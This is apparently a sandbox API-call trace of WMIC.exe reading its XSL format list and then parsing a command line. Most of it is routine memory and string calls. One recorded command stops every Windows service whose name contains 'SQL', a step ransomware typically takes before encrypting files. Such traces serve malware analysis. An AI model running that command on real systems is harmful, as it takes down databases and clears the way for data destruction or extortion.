[0247.636] malloc (_Size=0x18) returned 0x3b96a0 [0247.636] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.636] free (_Block=0x3b96a0) [0247.636] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x60070001c)) returned 0x0 [0247.636] malloc (_Size=0x18) returned 0x3b96a0 [0247.636] malloc (_Size=0x18) returned 0x3b96c0 [0247.636] SysStringLen (param_1="texttablewsys") returned 0xd [0247.637] SysStringLen (param_1="TABLE") returned 0x5 [0247.637] SysStringLen (param_1="texttablewsys") returned 0xd [0247.637] SysStringLen (param_1="XML") returned 0x3 [0247.637] SysStringLen (param_1="texttablewsys") returned 0xd [0247.637] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.637] SysStringLen (param_1="XML") returned 0x3 [0247.637] SysStringLen (param_1="texttablewsys") returned 0xd [0247.637] malloc (_Size=0x30) returned 0x3b8300 [0247.637] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.637] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.637] IUnknown:Release (This=0x212a280) returned 0x0 [0247.637] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=11, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.637] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.637] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.637] malloc (_Size=0x18) returned 0x3b96e0 [0247.637] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.637] free (_Block=0x3b96e0) [0247.637] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x60070001c)) returned 0x0 [0247.638] malloc (_Size=0x18) returned 0x3b96e0 [0247.638] malloc (_Size=0x18) returned 0x3b9700 [0247.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.638] SysStringLen (param_1="TABLE") returned 0x5 [0247.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.638] SysStringLen (param_1="XML") returned 0x3 [0247.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.638] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.638] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.638] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.638] malloc (_Size=0x30) returned 0x3b8340 [0247.638] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.638] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.638] IUnknown:Release (This=0x212a280) returned 0x0 [0247.638] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=12, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.638] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.638] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.638] malloc (_Size=0x18) returned 0x3b9720 [0247.638] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.639] free (_Block=0x3b9720) [0247.639] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x60070001c)) returned 0x0 [0247.639] malloc (_Size=0x18) returned 0x3b9720 [0247.639] malloc (_Size=0x18) returned 0x3b9740 [0247.639] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.639] SysStringLen (param_1="TABLE") returned 0x5 [0247.639] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.639] SysStringLen (param_1="XML") returned 0x3 [0247.639] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.639] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.639] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.639] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.639] malloc (_Size=0x30) returned 0x3b8380 [0247.639] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.639] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.639] IUnknown:Release (This=0x212a280) returned 0x0 [0247.639] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=13, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.640] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.640] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.640] malloc (_Size=0x18) returned 0x3b9760 [0247.640] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.640] free (_Block=0x3b9760) [0247.640] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x60070001c)) returned 0x0 [0247.640] malloc (_Size=0x18) returned 0x3b9760 [0247.640] malloc (_Size=0x18) returned 0x3b9780 [0247.640] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.640] SysStringLen (param_1="TABLE") returned 0x5 [0247.640] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.640] SysStringLen (param_1="XML") returned 0x3 [0247.640] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.640] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.640] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.640] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.640] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.640] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.641] malloc (_Size=0x30) returned 0x3b83c0 [0247.641] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.641] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.641] IUnknown:Release (This=0x212a280) returned 0x0 [0247.641] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=14, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.641] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.641] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.641] malloc (_Size=0x18) returned 0x3b97a0 [0247.641] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.641] free (_Block=0x3b97a0) [0247.641] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x60070001c)) returned 0x0 [0247.641] malloc (_Size=0x18) returned 0x3b97a0 [0247.641] malloc (_Size=0x18) returned 0x3b97c0 [0247.641] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0247.641] SysStringLen (param_1="TABLE") returned 0x5 [0247.642] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0247.642] SysStringLen (param_1="XML") returned 0x3 [0247.642] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0247.642] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.642] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0247.642] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.642] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0247.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.642] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.642] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0247.642] malloc (_Size=0x30) returned 0x3b8400 [0247.642] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.642] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.642] IUnknown:Release (This=0x212a280) returned 0x0 [0247.642] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=15, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.642] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="htable.xsl") returned 0x0 [0247.642] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.642] malloc (_Size=0x18) returned 0x3b97e0 [0247.642] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.643] free (_Block=0x3b97e0) [0247.643] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x60070001c)) returned 0x0 [0247.643] malloc (_Size=0x18) returned 0x3b97e0 [0247.643] malloc (_Size=0x18) returned 0x3b9800 [0247.643] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0247.643] SysStringLen (param_1="TABLE") returned 0x5 [0247.643] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0247.643] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.643] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0247.643] SysStringLen (param_1="XML") returned 0x3 [0247.643] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0247.643] SysStringLen (param_1="texttablewsys") returned 0xd [0247.643] SysStringLen (param_1="XML") returned 0x3 [0247.643] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0247.643] malloc (_Size=0x30) returned 0x3b8440 [0247.643] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.643] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.643] IUnknown:Release (This=0x212a280) returned 0x0 [0247.643] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=16, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.643] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="htable.xsl") returned 0x0 [0247.643] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.644] malloc (_Size=0x18) returned 0x3b9820 [0247.644] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.644] free (_Block=0x3b9820) [0247.644] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x60070001c)) returned 0x0 [0247.644] malloc (_Size=0x18) returned 0x3b9820 [0247.644] malloc (_Size=0x18) returned 0x3b9840 [0247.644] SysStringLen (param_1="htable-sortby") returned 0xd [0247.644] SysStringLen (param_1="TABLE") returned 0x5 [0247.644] SysStringLen (param_1="htable-sortby") returned 0xd [0247.644] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.644] SysStringLen (param_1="htable-sortby") returned 0xd [0247.644] SysStringLen (param_1="XML") returned 0x3 [0247.644] SysStringLen (param_1="htable-sortby") returned 0xd [0247.644] SysStringLen (param_1="texttablewsys") returned 0xd [0247.644] SysStringLen (param_1="htable-sortby") returned 0xd [0247.644] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0247.645] SysStringLen (param_1="XML") returned 0x3 [0247.645] SysStringLen (param_1="htable-sortby") returned 0xd [0247.645] malloc (_Size=0x30) returned 0x3b8480 [0247.645] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.645] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.645] IUnknown:Release (This=0x212a280) returned 0x0 [0247.645] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=17, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.645] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="mof.xsl") returned 0x0 [0247.645] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.645] malloc (_Size=0x18) returned 0x3b9860 [0247.645] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.645] free (_Block=0x3b9860) [0247.645] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x60070001c)) returned 0x0 [0247.645] malloc (_Size=0x18) returned 0x3b9860 [0247.645] malloc (_Size=0x18) returned 0x3b9880 [0247.645] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0247.646] SysStringLen (param_1="TABLE") returned 0x5 [0247.646] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0247.646] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.646] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0247.646] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.646] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0247.646] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.646] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.646] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0247.646] malloc (_Size=0x30) returned 0x3b84c0 [0247.646] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.646] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.646] IUnknown:Release (This=0x212a280) returned 0x0 [0247.646] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=18, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.647] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="mof.xsl") returned 0x0 [0247.647] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.647] malloc (_Size=0x18) returned 0x3b98a0 [0247.647] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.647] free (_Block=0x3b98a0) [0247.647] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x60070001c)) returned 0x0 [0247.647] malloc (_Size=0x18) returned 0x3b98a0 [0247.647] malloc (_Size=0x18) returned 0x3b98c0 [0247.647] SysStringLen (param_1="wmiclimofformat") returned 0xf [0247.647] SysStringLen (param_1="TABLE") returned 0x5 [0247.647] SysStringLen (param_1="wmiclimofformat") returned 0xf [0247.647] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.647] SysStringLen (param_1="wmiclimofformat") returned 0xf [0247.647] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.647] SysStringLen (param_1="wmiclimofformat") returned 0xf [0247.647] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0247.647] SysStringLen (param_1="wmiclimofformat") returned 0xf [0247.647] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0247.647] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.648] SysStringLen (param_1="wmiclimofformat") returned 0xf [0247.648] malloc (_Size=0x30) returned 0x3b8500 [0247.648] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.648] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.648] IUnknown:Release (This=0x212a280) returned 0x0 [0247.648] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=19, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.648] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="textvaluelist.xsl") returned 0x0 [0247.648] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.648] malloc (_Size=0x18) returned 0x3b98e0 [0247.648] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.648] free (_Block=0x3b98e0) [0247.648] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x60070001c)) returned 0x0 [0247.648] malloc (_Size=0x18) returned 0x3b98e0 [0247.648] malloc (_Size=0x18) returned 0x3b9900 [0247.649] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0247.649] SysStringLen (param_1="TABLE") returned 0x5 [0247.649] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0247.649] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.649] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0247.649] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.649] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0247.649] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.649] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.649] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0247.649] malloc (_Size=0x30) returned 0x3b8540 [0247.649] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.649] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.649] IUnknown:Release (This=0x212a280) returned 0x0 [0247.649] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=20, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.649] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="textvaluelist.xsl") returned 0x0 [0247.649] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.649] malloc (_Size=0x18) returned 0x3b9920 [0247.650] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.650] free (_Block=0x3b9920) [0247.650] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x60070001c)) returned 0x0 [0247.650] malloc (_Size=0x18) returned 0x3b9920 [0247.650] malloc (_Size=0x18) returned 0x3b9940 [0247.650] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0247.650] SysStringLen (param_1="TABLE") returned 0x5 [0247.650] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0247.650] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.650] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0247.650] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0247.650] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0247.650] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.650] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0247.650] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0247.650] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0247.650] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0247.650] malloc (_Size=0x30) returned 0x3b8580 [0247.651] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.651] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.651] IUnknown:Release (This=0x212a280) returned 0x0 [0247.651] IUnknown:Release (This=0x2129cc0) returned 0x0 [0247.651] FreeThreadedDOMDocument:IUnknown:Release (This=0x212bc50) returned 0x1 [0247.651] FreeThreadedDOMDocument:IUnknown:Release (This=0x21271d0) returned 0x0 [0247.651] free (_Block=0x3b9440) [0247.651] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice" [0247.651] malloc (_Size=0xd0) returned 0x3bcd30 [0247.651] memcpy_s (in: _Destination=0x3bcd30, _DestinationSize=0xce, _Source=0x4325ee, _SourceSize=0xc8 | out: _Destination=0x3bcd30) returned 0x0 [0247.651] malloc (_Size=0x18) returned 0x3b9440 [0247.651] malloc (_Size=0x18) returned 0x3b9960 [0247.651] malloc (_Size=0x18) returned 0x3b9980 [0247.651] malloc (_Size=0x18) returned 0x3b99a0 [0247.652] malloc (_Size=0x80) returned 0x3b6ea0 [0247.652] GetLocalTime (in: lpSystemTime=0x26f710 | out: lpSystemTime=0x26f710*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x6, wMilliseconds=0x1bf)) [0247.652] _vsnwprintf (in: _Buffer=0x3b6ea0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26f668 | out: _Buffer="04-28-2020T20:42:06") returned 19 [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] malloc (_Size=0x84) returned 0x3b7090 [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] malloc (_Size=0x84) returned 0x3bce10 [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] malloc (_Size=0xa) returned 0x3b99c0 [0247.652] lstrlenW (lpString="path") returned 4 [0247.652] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0247.652] malloc (_Size=0xa) returned 0x3b99e0 [0247.652] malloc (_Size=0x8) returned 0x3b7120 [0247.652] free (_Block=0x0) [0247.652] free (_Block=0x3b99c0) [0247.652] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.652] malloc (_Size=0x1c) returned 0x3bcea0 [0247.652] lstrlenW (lpString="Win32_Service") returned 13 [0247.652] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0247.652] malloc (_Size=0x1c) returned 0x3bced0 [0247.653] malloc (_Size=0x10) returned 0x3b99c0 [0247.653] memmove_s (in: _Destination=0x3b99c0, _DestinationSize=0x8, _Source=0x3b7120, _SourceSize=0x8 | out: _Destination=0x3b99c0) returned 0x0 [0247.653] free (_Block=0x3b7120) [0247.653] free (_Block=0x0) [0247.653] free (_Block=0x3bcea0) [0247.653] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.653] malloc (_Size=0xc) returned 0x3b9a00 [0247.653] lstrlenW (lpString="where") returned 5 [0247.653] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0247.653] malloc (_Size=0xc) returned 0x3b9a20 [0247.653] malloc (_Size=0x18) returned 0x3b9a40 [0247.653] memmove_s (in: _Destination=0x3b9a40, _DestinationSize=0x10, _Source=0x3b99c0, _SourceSize=0x10 | out: _Destination=0x3b9a40) returned 0x0 [0247.653] free (_Block=0x3b99c0) [0247.653] free (_Block=0x0) [0247.653] free (_Block=0x3b9a00) [0247.653] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.653] malloc (_Size=0x2c) returned 0x3b85c0 [0247.653] lstrlenW (lpString="\"name like '%%SQL%%'\"") returned 21 [0247.653] _wcsicmp (_String1="\"name like '%%SQL%%'\"", _String2="\"NULL\"") returned -20 [0247.653] lstrlenW (lpString="\"name like '%%SQL%%'\"") returned 21 [0247.653] lstrlenW (lpString="\"name like '%%SQL%%'\"") returned 21 [0247.653] malloc (_Size=0x2c) returned 0x3b8600 [0247.653] malloc (_Size=0x20) returned 0x3bcea0 [0247.653] memmove_s (in: _Destination=0x3bcea0, _DestinationSize=0x18, _Source=0x3b9a40, _SourceSize=0x18 | out: _Destination=0x3bcea0) returned 0x0 [0247.653] free (_Block=0x3b9a40) [0247.653] free (_Block=0x0) [0247.654] free (_Block=0x3b85c0) [0247.654] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.654] malloc (_Size=0xa) returned 0x3b9a40 [0247.654] lstrlenW (lpString="call") returned 4 [0247.654] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0247.654] malloc (_Size=0xa) returned 0x3b9a00 [0247.654] malloc (_Size=0x30) returned 0x3b85c0 [0247.654] memmove_s (in: _Destination=0x3b85c0, _DestinationSize=0x20, _Source=0x3bcea0, _SourceSize=0x20 | out: _Destination=0x3b85c0) returned 0x0 [0247.654] free (_Block=0x3bcea0) [0247.654] free (_Block=0x0) [0247.654] free (_Block=0x3b9a40) [0247.654] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 65 [0247.654] malloc (_Size=0x18) returned 0x3b9a40 [0247.654] lstrlenW (lpString="stopservice") returned 11 [0247.654] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0247.654] malloc (_Size=0x18) returned 0x3b99c0 [0247.654] free (_Block=0x0) [0247.654] free (_Block=0x3b9a40) [0247.654] malloc (_Size=0x30) returned 0x3b8640 [0247.654] lstrlenW (lpString="QUIT") returned 4 [0247.654] lstrlenW (lpString="path") returned 4 [0247.654] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0247.654] lstrlenW (lpString="EXIT") returned 4 [0247.654] lstrlenW (lpString="path") returned 4 [0247.654] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0247.655] free (_Block=0x3b8640) [0247.655] WbemLocator:IUnknown:AddRef (This=0x1d21390) returned 0x2 [0247.655] malloc (_Size=0x30) returned 0x3b8640 [0247.655] lstrlenW (lpString="/") returned 1 [0247.655] lstrlenW (lpString="path") returned 4 [0247.655] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0247.655] lstrlenW (lpString="-") returned 1 [0247.655] lstrlenW (lpString="path") returned 4 [0247.655] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0247.655] lstrlenW (lpString="CLASS") returned 5 [0247.655] lstrlenW (lpString="path") returned 4 [0247.655] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0247.655] lstrlenW (lpString="PATH") returned 4 [0247.655] lstrlenW (lpString="path") returned 4 [0247.655] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0247.655] lstrlenW (lpString="/") returned 1 [0247.655] lstrlenW (lpString="Win32_Service") returned 13 [0247.655] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0247.655] lstrlenW (lpString="-") returned 1 [0247.655] lstrlenW (lpString="Win32_Service") returned 13 [0247.655] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0247.655] lstrlenW 